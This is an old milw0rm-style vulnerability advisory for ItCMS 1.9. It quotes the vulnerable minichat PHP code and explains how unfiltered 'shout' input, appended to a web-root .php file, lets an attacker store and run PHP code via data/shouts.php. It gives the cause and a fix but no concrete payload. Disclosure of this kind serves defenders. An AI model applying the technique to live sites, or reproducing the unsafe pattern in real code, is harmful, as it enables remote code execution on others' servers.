#===========================================================================================================================# # _ ____ _ _ _ _ # # __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ # # / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | # # \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| # #===========================================================================================================================# # ItCMS 1.9 Remote File Rewriting # #===========================================================================================================================# # Author : Cod3rZ # #===========================================================================================================================# # Site : http://cod3rz.helloweb.eu # # Site : http://devilsnight.altervista.org # #===========================================================================================================================# # Remote File Rewriting: # #===========================================================================================================================# # /box/minichat/boxpop.php # #===========================================================================================================================# # if ($_POST["shout"]!=""){ # # $shout = $_POST['shout']; # # } else if ($_GET["shout"]!=""){ # # $shout = $_GET["shout"]; # # } # # [...] # # $shout = trim($shout); # # $shout = stripslashes($shout); # # $shout = str_replace ("\r\n", " [br] ", $shout); # # $shout = first($shout); # # [...] 
# # $FileName="data/shouts.php"; # # if($FilePointer=fopen($FileName, "a+")){ # # fwrite($FilePointer,"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|\n"); # # fclose($FilePointer); # #===========================================================================================================================# # So, we can write malicious PHP code into the variable $shout, which is appended to data/shouts.php, # # and then we go to data/shouts.php?rfi=[shell], where the stored code is executed. # # Cause: request input is appended to a .php file under the web root, and the filtering shown in the # # excerpt (trim, stripslashes, the \r\n replacement) does not remove PHP tags; first() is not shown here. # # Fix: keep the shouts in a non-executable data file outside the web root and encode them on output. # #===========================================================================================================================# # There are many other bugs; find them yourself # #===========================================================================================================================# # Devils Night Corporation - http://devilsnight.altervista.org # #===========================================================================================================================# # milw0rm.com [2008-05-02]